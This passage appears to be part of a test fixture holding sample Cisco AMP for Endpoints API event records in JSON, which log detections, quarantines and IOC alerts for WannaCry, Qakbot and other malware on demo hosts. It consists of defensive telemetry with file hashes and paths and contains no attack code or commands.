pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043964,"timestamp":1610624472,"timestamp_nanoseconds":498576872,"date":"2021-01-14T11:41:12+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ED01EBFBC9-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610624472,"start_date":"2021-01-14T11:41:12+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
